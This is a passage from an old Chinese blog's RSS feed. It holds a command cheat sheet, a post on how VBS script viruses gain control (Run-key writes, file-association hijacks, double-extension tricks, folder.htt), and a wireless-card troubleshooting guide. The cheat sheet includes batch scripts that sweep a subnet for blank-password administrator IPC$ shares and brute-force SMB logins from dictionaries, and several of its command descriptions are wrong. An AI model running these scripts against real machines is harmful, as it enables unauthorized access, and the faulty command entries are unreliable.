/>iisreset /start或stop 启动（停止）所有Internet服务 <br />iisreset /restart 停止然后重新启动所有Internet服务 <br />iisreset /status 显示所有Internet服务状态 <br />iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 <br />iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 <br />iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 <br />iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 <br />FTP 命令： (后面有详细说明内容) <br />ftp的命令行格式为: <br />ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。 <br />－d 使用调试方式。 <br />－n 限制ftp的自动登录,即不使用.netrc文件。 <br />－g 取消全局文件名。 <br />help [命令] 或 ？[命令] 查看命令说明 <br />bye 或 quit 终止主机FTP进程,并退出FTP管理方式. <br />pwd 列出当前远端主机目录 <br />put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 <br />get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 <br />mget [remote-files] 从远端主机接收一批文件至本地主机 <br />mput local-files 将本地主机中一批文件传送至远端主机 <br />dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 <br />ascii 设定以ASCII方式传送文件(缺省值) <br />bin 或 image 设定以二进制方式传送文件 <br />bell 每完成一次文件传送,报警提示 <br />cdup 返回上一级目录 <br />close 中断与远程服务器的ftp会话(与open对应) <br />open host[port] 建立指定ftp服务器连接,可指定连接端口 <br />delete 删除远端主机中的文件 <br />mdelete [remote-files] 删除一批文件 <br />mkdir directory-name 在远端主机中建立目录 <br />rename [from] [to] 改变远端主机中的文件名 <br />rmdir directory-name 删除远端主机中的目录 <br />status 显示当前FTP的状态 <br />system 显示远端主机系统类型 <br />user user-name [password] [account] 重新以别的用户名登录远端主机 <br />open host [port] 重新建立一个新的连接 <br />prompt 交互提示模式 <br />macdef 定义宏命令 <br />lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 <br />chmod 改变远端主机的文件权限 <br />case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 <br />cd remote－dir 进入远程主机目录 <br />cdup 进入远程主机目录的父目录 <br />! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip<br />MYSQL 命令： <br />mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。 <br />（例：mysql -h110.110.110.110 -Uroot -P123456 <br />注:u与root可以不用加空格，其它也一样） <br />exit 退出MYSQL <br />mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 <br />grant select on 数据库.* to 用户名@登录主机 identified by \&quot;密码\&quot;; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） <br />show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 <br />use mysql； <br />show tables; 显示库中的数据表 <br />describe 表名; 显示数据表的结构 <br />create database 库名; 建库 <br />use 库名； <br />create table 表名 (字段设定列表)； 建表 <br />drop database 库名; <br />drop table 表名； 删库和删表 <br />delete from 表名; 将表中记录清空 <br />select * from 表名; 显示表中的记录 <br />mysqldump --opt school&gt;school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 <br />win2003系统下新增命令（实用部份）： <br />shutdown /参数 关闭或重启本地或远程主机。 <br />参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。 <br />例：shutdown /r /t 0 立即重启本地主机（无延时） <br />taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。 <br />参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 <br />tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。 <br />参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。<br />Linux系统下基本命令： 要区分大小写 <br />uname 显示版本信息（同win2K的 ver） <br />dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） <br />pwd 查询当前所在的目录位置 <br />cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 <br />cat 文件名 查看文件内容 <br />cat &gt;abc.txt 往abc.txt文件中写上内容。 <br />more 文件名 以一页一页的方式显示一个文本文件。 <br />cp 复制文件 <br />mv 移动文件 <br />rm 文件名 删除文件，rm -a 目录名删除目录及子目录 <br />mkdir 目录名 建立目录 <br />rmdir 删除子目录，目录内没有文档。 <br />chmod 设定档案或目录的存取权限 <br />grep 在档案中查找字符串 <br />diff 档案文件比较 <br />find 档案搜寻 <br />date 现在的日期、时间 <br />who 查询目前和你使用同一台机器的人以及Login时间地点 <br />w 查询目前上机者的详细资料 <br />whoami 查看自己的帐号名称 <br />groups 查看某人的Group <br />passwd 更改密码 <br />history 查看自己下过的命令 <br />ps 显示进程状态 <br />kill 停止某进程 <br />gcc 黑客通常用它来编译C语言写的文件 <br />su 权限转换为指定使用者 <br />telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 <br />ftp ftp连接上某服务器（同win2K）<br />附：批处理命令与变量<br />1：for命令及变量 基本格式： <br />FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。 <br />批处理每次能处理的变量从%0&mdash;%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2&mdash;%9指输入的第2-9个值；例：net use $&quot;&gt;\\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3<br />(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{&ldquo;(1 1 254)&rdquo;第一个&quot;1&quot;指起始值，第二个&quot;1&quot;指增长量，第三个&quot;254&quot;指结束值，即：从1到254；&ldquo;(1 -1 254)&rdquo;说明：即从254到1}<br />command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：&amp; 来隔开 <br />command_parameters：为特定命令指定参数或命令行开关<br />IN (set)：指在(set)中取值；DO command ：指执行command<br />参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 <br />用法举例： <br />@echo off <br />echo 用法格式：test.bat *.*.* &gt; test.txt<br />for /L %%G in (1 1 254) do echo %1.%%G &gt;&gt;test.txt &amp; net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find &quot;命令成功完成&quot; &gt;&gt;test.txt <br />存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。<br />/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；&amp; 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有&quot;命令成功完成&quot;信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 <br />@echo off <br />echo 用法格式：ok.bat ip <br />FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 <br />存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。<br />&nbsp;&nbsp;&nbsp;&nbsp; Net命令的另类用法 <br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Net User命令是一个DOS命令，必须在Windows XP下的MS-DOS模式下运行，所以首先要进入MS-DOS模式：选择&ldquo;开始&rdquo;菜单的&ldquo;附件&rdquo;选项的子选项&ldquo;命令提示符&rdquo;，或在&ldquo;开始&rdquo;菜单的&ldquo;运行&rdquo;选项（快捷键为Win+R）中输入&ldquo;cmd.exe&rdquo;，进入MS-DOS模式。以下功能都基于此模式下。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 建立一个普通新用户在MS-DOS提示符中输入如下命令：&ldquo;net user john 123 /add&rdquo;，回车。即可新建一个名为&ldquo;John&rdquo;，密码为&ldquo;123&rdquo;的新用户。Add参数表示新建用户。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 值得注意的是：用户名最多可有 20 个字符，密码最多可有 127 个字符。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 建立一个登录时间受限制的用户用以下方法可实现对电脑使用时间的控制。比如，需要建立一个John的用户账号，密码为&ldquo;123&rdquo;，登录权限从星期一到星期五的早上八点到晚上十点和双休日的晚上七点到晚上九点。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1. 12小时制可键入如下命令：&ldquo;net user john 123 /add /times：monday-friday，8AM-10PM；saturday-sunday，7PM-9PM&rdquo;，回车确定即可。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2. 24小时制可键入如下命令：&ldquo;net user john 123 /add /times：M-F，8：00-22：00；Sa-Su，19：00-21：00&rdquo;，回车确定即可。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 值得注意的是：Time的增加值限制为1小时。对于Day值，可以用全称或缩写（即 M、T、W、Th、F、Sa、Su）。可以使用12小时或24小时时间表示法。对于12小时表示法，请使用AM、PM或A.M.、P.M.。All值表示用户始终可以登录；空值（空白）意味着用户永远不能登录。用逗号分隔日期和时间，用分号分隔日期和时间单元（例如，M，4AM-5PM；T，1PM-3PM）。指定时间时不要使用空格。<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 另外，Passwordchg：{yesno}参数可用来指定用户是否可以更改自己的密码，默认设置为 Yes.限定用户的使用时间Net User命令还可以使用参数Expires：{{mm/dd/yyyy dd/mm/yyyy mmm，dd ，yyyy} never} 使用户账号根据指定的Date过期限定用户。过期日期可以是 [mm/dd/yyyy]、[dd/mm/yyyy] 或[mmm，dd，yyyy]格式。它取决于国家（地区）代码。用户账号在指定日期开始时到期。对于月份值，可以使用数字、全称或三个字母的缩写（即Jan、Feb、Mar、Apr、May、Jun、Jul、Aug、Sep、Oct、Nov、Dec）。对于年份值，可以使用两位数或四位数；使用逗号和斜杠分隔日期的各部分；不要使用空格。<br />&nbsp;&nbsp;&nbsp;&nbsp; Netsh的使用(组图) <br />　　有朋友问我，&ldquo;能不能在命令行下直接修改Windows2000的IP地址？&rdquo;。<br />　　<br />　　当然是可以的了。不仅可以修改IP地址，和网络相关的每个细节都可以用命令行方式进行配置。<br />　　<br />　　只不过一般大家不太习惯罢了。<br />　　<br />　　方法就是使用系统中提供的一个命令行工具&ldquo;netsh&rdquo;：<br />　　<br />　　首先，察看自己现在的ip地址：<br />　　　</font></p>
<p><font size="3">　　列出了两块网卡，其中接口名为&ldquo;本地连接&rdquo;的这块网卡配置情况：<br />　　<br />　　使用了固定IP，其中ip地址为192.168.0.4，其他信息略（自己不会看啊）<br />　　<br />　　好了，我们来修改这个IP<br />　　<br />　　改成什么呢，稍微改一点点吧：　<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 现在ip就是192.168.0.5了。<br />　　<br />　　其实刚才改IP的时候并没有把命令写完整，完整的看这个：　</font></p>
<p><font size="3">　　一堆命令吧，现在的IP地址已经修改成10.0.0.13了。<br />　　<br />　　当然，命令行下修改IP也可以只用1条命令　</font></p>
<p><font size="3">　　到这里，netsh的最最最简单的功能，命令行下修改IP地址&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 已经说完了<br />　　<br />　　看到一个朋友是做网管的，管理着公司几个不同的网络，每次都要抱着笔记本修改成不同的ip地址、不同的子网掩码、、、其实，只要能够充分的发挥Netsh脚本的功能，就可以最快捷的修改自身的网络配置。<br />　　　　<br />　　首先，显示一个配置脚本　<br />　　我们进入Netsh环境，切换到interface ip环境<br />　　<br />　　通过dump命令将当前配置情况显示了出来。<br />　　<br />　　第二步，导出一个配置脚本　<br />　　这样，我们就把刚才显示的配置脚本保存成了一个文件c:\interface.txt<br />　　<br />　　第三步，复制一个脚本拷贝interface2.txt并修改它<br />　　<br />　　原因？简单嘛，为了更方便的切换网络环境啊　</font></p>
<p><font size="3">　　注意哦，我们已经把所需要修改的ip地址、子网掩码、网关和dns做了修改。<br />　　<br />　　最后，再把新的配置文件直接导入系统。　<br />　　到这里，已经把网络配置部分修改了</font></p>
<p><font size="3">　　总结：<br />　　<br />　　通过Netsh里面的dump命令可以直接显示配置脚本。<br />　　<br />　　而通过netsh -c interface ip dump &gt;c:\interface.txt的方式可以导出配置脚本。<br />　　<br />　　然后再netsh -f c:\interface.txt的方式又可以把导出的配置脚本再导回去。<br />　　<br />　　一来一去间，就可以轻松的实现方便的修改网络配置。<br />　　<br />　　Netsh里面还有很多很多命令，诸如可以进入netsh环境后，在根级目录用exec命令<br />　　<br />　　也可以加载一个配置脚本。<br />　　<br />　　另外还有对wins、路由、ras等网络服务的配置也可以通过Netsh的内置命令直接操作。<br />　　<br />　　Windows的帮助里面都有相关的介绍。<br />&nbsp;&nbsp; 计算机运行命令全集 <br />winver---------检查Windows版本<br />wmimgmt.msc----打开windows管理体系结构<br />wupdmgr--------windows更新程序<br />winver---------检查Windows版本<br />wmimgmt.msc----打开windows管理体系结构<br />wupdmgr--------windows更新程序<br />wscript--------windows脚本宿主设置<br />write----------写字板winmsd-----系统信息<br />wiaacmgr-------扫描仪和照相机向导<br />winchat--------XP自带局域网聊天<br />mem.exe--------显示内存使用情况<br />Msconfig.exe---系统配置实用程序 <br />mplayer2-------简易widnows media player<br />mspaint--------画图板<br />mstsc----------远程桌面连接<br />player2-------媒体播放机<br />magnify--------放大镜实用程序<br />mmc------------打开控制台<br />mobsync--------同步命令<br />dxdiag---------检查DirectX信息<br />drwtsn32------ 系统医生<br />devmgmt.msc--- 设备管理器<br />dfrg.msc-------磁盘碎片整理程序<br />diskmgmt.msc---磁盘管理实用程序<br />dcomcnfg-------打开系统组件服务<br />ddeshare-------打开DDE共享设置<br />dvdplay--------DVD播放器<br />net stop messenger-----停止信使服务<br />net start messenger----开始信使服务 <br />notepad--------打开记事本<br />nslookup-------网络管理的工具向导<br />ntbackup-------系统备份和还原<br />narrator-------屏幕&quot;讲述人&quot;<br />ntmsmgr.msc----移动存储管理器<br />ntmsoprq.msc---移动存储管理员操作请求<br />netstat -an----(TC)命令检查接口<br />syncapp--------创建一个公文包<br />sysedit--------系统配置编辑器<br />sigverif-------文件签名验证程序<br />sndrec32-------录音机<br />shrpubw--------创建共享文件夹<br />secpol.msc-----本地安全策略<br />syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码<br />services.msc---本地服务设置<br />Sndvol32-------音量控制程序<br />sfc.exe--------系统文件检查器<br />sfc /scannow---windows文件保护<br />Nslookup-------60秒倒计时关机命令<br />tourstart------xp简介（安装完成后出现的漫游xp程序）<br />taskmgr--------任务管理器<br />eventvwr-------事件查看器<br />eudcedit-------造字程序 <br />explorer-------打开资源管理器<br />packager-------对象包装程序<br />perfmon.msc----计算机性能监测程序<br />progman--------程序管理器<br />regedit.exe----注册表 <br />rsop.msc-------组策略结果集<br />regedt32-------注册表编辑器<br />rononce -p ----15秒关机<br />regsvr32 /u *.dll----停止dll文件运行<br />regsvr32 /u zipfldr.dll------取消ZIP支持<br />cmd.exe--------CMD命令提示符<br />chkdsk.exe-----Chkdsk磁盘检查<br />certmgr.msc----证书管理实用程序<br />calc-----------启动计算器<br />charmap--------启动字符映射表<br />cliconfg-------SQL SERVER 客户端网络实用程序<br />Clipbrd--------剪贴板查看器<br />conf-----------启动netmeeting<br />compmgmt.msc---计算机管理<br />cleanmgr-------**整理<br />ciadv.msc------索引服务程序<br />osk------------打开屏幕键盘<br />odbcad32-------ODBC数据源管理器<br />oobe/msoobe /a----检查XP是否激活<br />lusrmgr.msc----本机用户和组<br />logoff---------注销命令<br />iexpress-------木马捆绑工具，系统自带<br />Nslookup-------IP地址侦测器<br />fsmgmt.msc-----共享文件夹管理器<br />utilman--------辅助工具管理器<br />gpedit.msc-----组策略<br /></font></p>]]></description>
		</item>
		    
		
		<item>
			<title>VBS脚本病毒&#8221;获得控制权的典型方法</title>
			<link>http://qune1.blog.sohu.com/97624145.html</link>
			<comments>http://qune1.blog.sohu.com/97624145.html#comment</comments>
			<dc:creator>忆思雨帘</dc:creator>
			<pubDate>Tue, 19 Aug 2008 14:45:22 +0800</pubDate>
			<guid>http://qune1.blog.sohu.com/97624145.html</guid>
			<description><![CDATA[<p><font size="3">VBS脚本病毒&rdquo;获得控制权的典型方法</font></p>
<p><font size="3">如何获取控制权？这一个是一个比较有趣的话题，而VBS脚本病毒似乎将这个话题发挥的淋漓尽致。在这里列出几种典型的方法： </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp; 一、修改注册表项 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp; windows在启动的时候，会自动加载HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项下的各键值所执向的程序。脚本病毒可以在此项下加入一个键值指向病毒程序，这样就可以保证每次机器启动的时候拿到控制权。vbs修改贮册表的方法比较简单，直接调用下面语句即可。 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp; wsh.RegWrite(strName, anyvalue [,strType])<br />&nbsp;<br />&nbsp;&nbsp;&nbsp; 二、通过映射文件执行方式 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp; 譬如，我们新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码。 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp; 三、欺骗用户，让用户自己执行 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp; 这种方式其实和用户的心理有关。譬如，病毒在发送附件时，采用双后缀的文件名，由于默认情况下，后缀并不显示，举个例子，文件名为beauty.jpg.vbs的vbs程序显示为beauty.jpg，这时用户往往会把它当成一张图片去点击。同样，对于用户自己磁盘中的文件，病毒在感染它们的时候，将原有文件的文件名作为前缀，vbs作为后缀产生一个病毒文件，并删除原来文件，这样，用户就有可能将这个vbs文件看作自己原来的文件运行。 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp; 四、desktop.ini和folder.htt互相配合 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp; 这两个文件可以用来配置活动桌面，也可以用来自定义文件夹。如果用户的目录中含有这两个文件，当用户进入该目录时，就会触发folder.htt中的病毒代码。这是新欢乐时光病毒采用的一种比较有效的获取控制权的方法。并且利用folder.htt，还可能触发exe文件，这也可能成为病毒得到控制权的一种有效方法！ </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp; 病毒获得控制权的方法还有很多，这方面病毒作者发挥的余地也比较大。<br /></font></p>]]></description>
		</item>
		    
		
		<item>
			<title>无线网卡故障之步步排查</title>
			<link>http://qune1.blog.sohu.com/97614514.html</link>
			<comments>http://qune1.blog.sohu.com/97614514.html#comment</comments>
			<dc:creator>忆思雨帘</dc:creator>
			<pubDate>Tue, 19 Aug 2008 13:04:22 +0800</pubDate>
			<guid>http://qune1.blog.sohu.com/97614514.html</guid>
			<description><![CDATA[<table cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td align="left">
<p>&nbsp;&nbsp;&nbsp; 尽管无线上网的方式已经随处可见了，但要想高效进行无线上网并不是一件容易的事情，因为在和无线网络&ldquo;长期接触&rdquo;的日子里，你或许经常会碰到无线网卡发生各种稀奇古怪的故障，如果不及时将这些故障排除掉的话，将会严重影响无线上网的效率。有鉴于此，本文下面就把无线网卡在安装过程中经常容易出现的故障现象总结出来，并对这些故障进行步步排查分析，以帮助各位网友高效地排除无线上网的故障。</p>
<p>　　<strong>排除安装蓝屏故障</strong></p>
<p>　　如果将无线网卡安装到计算机中后，屏幕上立即出现蓝屏故障时，你首先应该看看安装无线网卡时使用的驱动程序是否与当前计算机的操作系统相一致;比方说，倘若无线网卡驱动程序只能用于Windows 2000操作系统，但你却将它安装到Window XP操作系统下的话，那么屏幕出现蓝屏故障的可能性比较大。因此，在安装无线网卡驱动程序时，一定要检查一下驱动程序版本是否适用于当前操作系统，如果不适用的话，必须找到与当前操作系统相适应的网卡驱动程序。</p>
<p>　　在排除了网卡驱动程序因素之后，你需要对无线网卡的安装连接进行一下检查，看看无线网卡是否正确、紧密地插入到计算机的对应插槽或接口中;比方说，一旦将无线网卡插入到主板中的PCMCIA接口或者USB接口中不到几秒钟的工夫又迅速将它拔出来的话，也十分容易导致计算机屏幕发生蓝屏现象，毕竟频繁地插拔无线网卡会导致计算机相应端口的识别混乱或者识别出错。另外需要提醒各位的是，如果无线网卡上的LINK指示灯在频繁闪烁的时候，你突然将网卡从计算机上拔出来的话，不但容易出现屏幕蓝屏故障，而且还有可能损坏计算机或者无线网卡的相应接口。</p>
<p>　　<strong>排除插拔死机故障</strong></p>
<p>　　有时候将无线网卡突然从计算机的相应端口中拔出来时，计算机会出现死机故障，而且这种故障发生的频率也比较高。之所以会出现插拔死机故障，是因为许多朋友都认为无线网卡的USB接口或者PCMCIA接口支持热插拔功能，可以进行即插即用。但这些用户把即插即用当作了随意插拔，殊不知无线网卡在工作的过程中是不能进行插拔的，这样不但容易损坏无线网卡或计算机的相应接口，而且也容易造成系统死机现象。</p>
<p>　　因此当大家遇到插拔无线网卡死机现象时，首先应该确认一下是否在网卡工作的时候进行插拔操作的话，如果是的话那就证明死机现象是由非法插拔无线网卡造成的，此时唯一的办法就是重新启动一下计算机系统，以便消除系统死机现象。另外，为了尽可能避免这一现象的发生，大家以后在插拔无线网卡时，一定不要进行与网络通信或信息传输相关的工作，而且为稳妥起见，最好从系统的设备管理器中打开网卡的属性设置窗口，然后在其中将网卡设备暂时禁用，这样一来再拔除无线网卡就会十分安全了。</p>
<p>　　<strong>排除无法工作故障</strong></p>
<p>　　如果你使用的是USB接口的无线网卡时，很有可能遇到无线网卡已经安装到计算机中，而且系统也已经识别到网卡，屏幕同时显示正在安装该设备驱动，可是安装好该设备后，你却发现安装好的无线网卡并不能正常工作，遇到这种故障现象时，你该怎样逐步排查呢?其实仔细分析上面的故障现象，你会发现计算机已经能够识别到无线网卡，那就表明计算机主板上的USB端口功能已经被成功启用，计算机的USB端口和无线网卡的USB接口都是正常的，很明显这种故障是由网卡驱动程序安装不正确造成的。</p>
<p>　　一般来说，计算机的USB端口如果是第一次被使用的话，可能需要安装或者更新对应的USB控制器程序，所以你不妨打开系统的设备管理器窗口，双击其中的USB控制器选项，然后进入到该控制器的驱动程序标签页面，通过其中的&ldquo;更新驱动程序&rdquo;按钮来将USB控制器的驱动程序更新到最新状态。如果上面的操作无法让无线网卡正常工作的话，你再看看无线网卡的驱动程序安装方法是否正确，因为有的USB接口的无线网卡与普通网卡的驱动程序安装步骤不一样，比方说有的无线网卡需要先安装驱动程序，之后将网卡插入到计算机中，系统再对其进行自动配置和安装，要是安装顺序搞错的话，那就很容易造成无线网卡无法工作的故障。</p></td></tr>
<tr>
<td height="20">&nbsp;</td></tr></tbody></table>]]></description>
		</item>
		    
		
	</channel>
</rss>
